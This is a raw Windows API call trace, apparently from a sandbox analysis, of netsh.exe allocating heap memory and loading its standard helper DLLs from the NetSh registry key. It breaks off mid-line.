[0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271a90 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271ab0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271ad0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271af0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271b10 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271b30 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271b50 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271b70 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271b90 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271bb0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271bd0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271bf0 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271c10 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271c30 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271c50 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271c70 [0120.439] GetProcessHeap () returned 0x250000 [0120.439] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271c90 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271cb0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271cd0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271cf0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271d10 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271d30 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271d50 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271d70 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271d90 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271db0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271dd0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271df0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271e10 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271e30 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271e50 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271e70 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271e90 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271eb0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271ed0 [0120.440] GetProcessHeap () returned 0x250000 [0120.440] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271ef0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271f10 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271f30 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271f50 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271f70 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271f90 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271fb0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271fd0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x271ff0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272010 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272030 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272090 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2720b0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2720d0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2720f0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272110 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272130 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272150 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272170 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272190 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2721b0 [0120.441] GetProcessHeap () returned 0x250000 [0120.441] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2721d0 [0120.441] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2721f0 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272210 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272230 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272250 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272270 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x272290 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2722b0 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x10) returned 0x2722d0 [0120.442] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0120.442] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x28) returned 0x26e030 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2) returned 0x272860 [0120.442] GetProcessHeap () returned 0x250000 [0120.442] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x14) returned 0x2722f0 [0120.442] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0120.442] GetProcessHeap () returned 0x250000 [0120.442] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0120.442] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x58) returned 0x272880 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x250000) returned 1 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xb0) returned 0x2728e0 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272880 | out: hHeap=0x250000) returned 1 [0120.443] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x167828 | out: phkResult=0x167828*=0x90) returned 0x0 [0120.443] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x167850, lpcbMaxValueNameLen=0x167860, lpcbMaxValueLen=0x167858, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x167850*=0x15, lpcbMaxValueNameLen=0x167860, lpcbMaxValueLen=0x167858, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x16) returned 0x272310 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x23) returned 0x26e060 [0120.443] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="4", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0120.443] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0120.443] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x50) returned 0x272880 [0120.443] GetProcessHeap () returned 0x250000 [0120.443] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x4) returned 0x2729a0 [0120.444] GetProcessHeap () returned 0x250000 [0120.444] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x26e090 [0120.444] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0120.444] GetProcessHeap () returned 0x250000 [0120.444] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26e030 | out: hHeap=0x250000) returned 1 [0120.444] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef2e80000 [0125.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x167220 | out: lpSystemTimeAsFileTime=0x167220*(dwLowDateTime=0xf7fe5fc0, dwHighDateTime=0x1d6a20a)) [0125.146] GetCurrentProcessId () returned 0x38c [0125.146] GetCurrentThreadId () returned 0x6a0 [0125.146] GetTickCount () returned 0x1154099 [0125.146] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x167228 | out: lpPerformanceCount=0x167228*=24520000547) returned 1 [0125.147] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefdee0000 [0125.147] GetVersion () returned 0x1db10106 [0125.147] SetErrorMode (uMode=0x0) returned 0x0 [0125.147] SetErrorMode (uMode=0x8001) returned 0x0 [0125.147] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x274330 [0125.147] LocalFree (hMem=0x274330) returned 0x0 [0125.147] GetVersion () returned 0x1db10106 [0125.148] GlobalLock (hMem=0x840008) returned 0x274330 [0125.149] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x274550 [0125.149] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x273050 [0125.149] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x272330 [0125.149] malloc (_Size=0x100) returned 0x417bd0 [0125.149] __dllonexit () returned 0x7fef2de621c [0125.149] __dllonexit () returned 0x7fef2de66e0 [0125.149] __dllonexit () returned 0x7fef2de72b8 [0125.149] __dllonexit () returned 0x7fef2de87cc [0125.150] __dllonexit () returned 0x7fef2de8d64 [0125.150] __dllonexit () returned 0x7fef2de8db4 [0125.150] __dllonexit () returned 0x7fef2de8e70 [0125.150] __dllonexit () returned 0x7fef2dea308 [0125.150] __dllonexit () returned 0x7fef2de8810 [0125.150] __dllonexit () returned 0x7fef2df7598 [0125.150] __dllonexit () returned 0x7fef2de8880 [0125.151] __dllonexit () returned 0x7fef2dea170 [0125.151] __dllonexit () returned 0x7fef2dea280 [0125.151] __dllonexit () returned 0x7fef2dead44 [0125.151] __dllonexit () returned 0x7fef2debc30 [0125.151] __dllonexit () returned 0x7fef2debc80 [0125.151] __dllonexit () returned 0x7fef2dec338 [0125.151] __dllonexit () returned 0x7fef2ded030 [0125.152] __dllonexit () returned 0x7fef2de59cc [0125.152] __dllonexit () returned 0x7fef2de59f0 [0125.152] __dllonexit () returned 0x7fef2de5a1c [0125.153] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0125.154] __dllonexit () returned 0x7fef2df7568 [0125.154] __dllonexit () returned 0x7fef2df7574 [0125.154] __dllonexit () returned 0x7fef2df7580 [0125.154] __dllonexit () returned 0x7fef2df758c [0125.154] GetVersion () returned 0x1db10106 [0125.154] GetVersion () returned 0x1db10106 [0125.154] GetVersion () returned 0x1db10106 [0125.154] __dllonexit () returned 0x7fef2d4a15c [0125.155] __dllonexit () returned 0x7fef2d56610 [0125.155] __dllonexit () returned 0x7fef2de8910 [0125.155] __dllonexit () returned 0x7fef2de8b90 [0125.155] __dllonexit () returned 0x7fef2de8bb4 [0125.155] __dllonexit () returned 0x7fef2d66ae0 [0125.155] GetVersion () returned 0x1db10106 [0125.155] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0125.155] GetSystemMetrics (nIndex=11) returned 32 [0125.155] GetSystemMetrics (nIndex=12) returned 32 [0125.156] GetSystemMetrics (nIndex=2) returned 17 [0125.156] GetSystemMetrics (nIndex=3) returned 17 [0125.156] GetDC (hWnd=0x0) returned 0xa0109cb [0125.156] GetDeviceCaps (hdc=0xa0109cb, index=88) returned 96 [0125.156] GetDeviceCaps (hdc=0xa0109cb, index=90) returned 96 [0125.156] ReleaseDC (hWnd=0x0, hDC=0xa0109cb) returned 1 [0125.156] GetSysColor (nIndex=15) returned 0xf0f0f0 [0125.156] GetSysColor (nIndex=16) returned 0xa0a0a0 [0125.156] GetSysColor (nIndex=20) returned 0xffffff [0125.156] GetSysColor (nIndex=18) returned 0x0 [0125.156] GetSysColor (nIndex=6) returned 0x646464 [0125.156] GetSysColorBrush (nIndex=15) returned 0x1100059 [0125.156] GetSysColorBrush (nIndex=6) returned 0x1100061 [0125.156] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0125.156] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0125.156] __dllonexit () returned 0x7fef2de8f84 [0125.156] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0125.156] __dllonexit () returned 0x7fef2d73990 [0125.156] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0125.156] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0125.156] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0125.156] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0125.157] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0125.157] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0125.157] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0125.157] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0125.157] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0125.157] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0125.157] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0125.157] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0125.157] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0125.157] __dllonexit () returned 0x7fef2df75a4 [0125.157] __dllonexit () returned 0x7fef2df75bc [0125.157] __dllonexit () returned 0x7fef2df75c8 [0125.158] __dllonexit () returned 0x7fef2df75d4 [0125.158] __dllonexit () returned 0x7fef2df75e0 [0125.158] GetCursorPos (in: lpPoint=0x7fef2e526d8 | out: lpPoint=0x7fef2e526d8*(x=380, y=629)) returned 1 [0125.158] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2748a0 [0125.158] LocalReAlloc (hMem=0x272330, uBytes=0x18, uFlags=0x2) returned 0x2749b0 [0125.159] GetCurrentThread () returned 0xfffffffffffffffe [0125.159] GetCurrentThreadId () returned 0x6a0 [0125.159] __dllonexit () returned 0x7fef2decfa4 [0125.159] SetErrorMode (uMode=0x0) returned 0x8001 [0125.159] SetErrorMode (uMode=0x8001) returned 0x0 [0125.159] GetModuleFileNameW (in: hModule=0x7fef2d30000, lpFilename=0x166910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0125.159] wcscpy_s (in: _Destination=0x166b20, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0125.163] FindResourceW (hModule=0x7fef2d30000, lpName=0xe01, lpType=0x6) returned 0x2409b0 [0125.165] LoadStringW (in: hInstance=0x7fef2d30000, uID=0xe000, lpBuffer=0x166d30, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0125.166] wcscpy_s (in: _Destination=0x166944, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0125.166] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0125.168] malloc (_Size=0x80) returned 0x417e00 [0125.168] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2749d0 [0125.168] GetSystemDirectoryA (in: lpBuffer=0x166fb0, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.168] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0125.168] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0125.168] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0125.168] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0125.172] GetProcAddress (hModule=0x7fef2e80000, lpProcName="InitHelperDll") returned 0x7fef2e9cf70 [0125.172] InitHelperDll () returned 0x0 [0125.173] RegisterHelper () returned 0x0 [0125.173] GetProcessHeap () returned 0x250000 [0125.173] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x108) returned 0x276ae0 [0125.173] GetProcessHeap () returned 0x250000 [0125.173] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2728e0 | out: hHeap=0x250000) returned 1 [0125.174] RegisterHelper () returned 0x0 [0125.174] GetProcessHeap () returned 0x250000 [0125.174] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x160) returned 0x276bf0 [0125.174] GetProcessHeap () returned 0x250000 [0125.174] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276ae0 | out: hHeap=0x250000) returned 1 [0125.174] RegisterHelper () returned 0x0 [0125.174] GetProcessHeap () returned 0x250000 [0125.174] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1b8) returned 0x276d60 [0125.174] GetProcessHeap () returned 0x250000 [0125.174] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276bf0 | out: hHeap=0x250000) returned 1 [0125.175] RegisterHelper () returned 0x0 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x210) returned 0x276ae0 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276d60 | out: hHeap=0x250000) returned 1 [0125.175] RegisterHelper () returned 0x0 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x268) returned 0x276d00 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276ae0 | out: hHeap=0x250000) returned 1 [0125.175] RegEnumValueW (in: hKey=0x90, dwIndex=0x1, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="nshwfp", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0125.175] _wcsicmp (_String1="nshwfp.dll", _String2="ipxmontr.dll") returned 5 [0125.175] _wcsicmp (_String1="nshwfp.dll", _String2="ipxpromn.dll") returned 5 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x78) returned 0x2728e0 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xe) returned 0x272330 [0125.175] GetProcessHeap () returned 0x250000 [0125.175] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x16) returned 0x272350 [0125.175] _wcsupr (in: _String="nshwfp.dll" | out: _String="NSHWFP.DLL") returned="NSHWFP.DLL" [0125.175] GetProcessHeap () returned 0x250000 [0125.175] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x272880 | out: hHeap=0x250000) returned 1 [0125.175] LoadLibraryW (lpLibFileName="NSHWFP.DLL") returned 0x7fef2f60000 [0128.201] GetProcAddress (hModule=0x7fef2f60000, lpProcName="InitHelperDll") returned 0x7fef2fcb6d0 [0128.201] InitHelperDll () returned 0x0 [0128.224] RegisterHelper () returned 0x0 [0128.224] GetProcessHeap () returned 0x250000 [0128.224] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x2c0) returned 0x280ea0 [0128.224] GetProcessHeap () returned 0x250000 [0128.224] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276d00 | out: hHeap=0x250000) returned 1 [0128.224] RegEnumValueW (in: hKey=0x90, dwIndex=0x2, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="dhcpclient", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0128.225] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0128.225] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0128.225] GetProcessHeap () returned 0x250000 [0128.225] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xa0) returned 0x276d00 [0128.225] GetProcessHeap () returned 0x250000 [0128.225] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x16) returned 0x272370 [0128.225] GetProcessHeap () returned 0x250000 [0128.225] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x22) returned 0x277330 [0128.225] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0128.225] GetProcessHeap () returned 0x250000 [0128.225] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2728e0 | out: hHeap=0x250000) returned 1 [0128.225] LoadLibraryW (lpLibFileName="DHCPCMONITOR.DLL") returned 0x7fef3400000 [0131.639] GetProcAddress (hModule=0x7fef3400000, lpProcName="InitHelperDll") returned 0x7fef3401a40 [0131.639] InitHelperDll () returned 0x0 [0131.639] RegisterHelper () returned 0x0 [0131.639] GetProcessHeap () returned 0x250000 [0131.639] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x318) returned 0x285e30 [0131.639] GetProcessHeap () returned 0x250000 [0131.639] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x280ea0 | out: hHeap=0x250000) returned 1 [0131.639] RegEnumValueW (in: hKey=0x90, dwIndex=0x3, lpValueName=0x272310, lpcchValueName=0x167820, lpReserved=0x0, lpType=0x0, lpData=0x26e060, lpcbData=0x167868 | out: lpValueName="wshelper", lpcchValueName=0x167820, lpType=0x0, lpData=0x26e060, lpcbData=0x167868) returned 0x0 [0131.639] _wcsicmp (_String1="wshelper.dll", _String2="ipxmontr.dll") returned 14 [0131.640] _wcsicmp (_String1="wshelper.dll", _String2="ipxpromn.dll") returned 14 [0131.640] GetProcessHeap () returned 0x250000 [0131.640] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0xc8) returned 0x280ea0 [0131.640] GetProcessHeap () returned 0x250000 [0131.640] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x12) returned 0x2835e0 [0131.640] GetProcessHeap () returned 0x250000 [0131.640] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x1a) returned 0x2815f0 [0131.640] _wcsupr (in: _String="wshelper.dll" | out: _String="WSHELPER.DLL") returned="WSHELPER.DLL" [0131.640] GetProcessHeap () returned 0x250000 [0131.640] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x276d00 | out: hHeap=0x250000) returned 1 [0131.640] LoadLibraryW (lpLibFileName="WSHELPER.DLL") returned 0x7fef33f0000 [0133.919] GetProcAddress (hModule=0x7fef33f0000, lpProcName="InitHelperDll") returned 0x7fef33f1720 [0133.919] InitHelperDll () returned 0x0 [0133.928] RegisterHelper () returned 0x0 [0133.928] GetProcessHeap () returned 0x250000 [0133.929] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x370) returned 0x286ba0 [0133.929] GetProcessHeap () returned 0x250000 [0133.929] HeapFree (in: hHeap=0x250000, 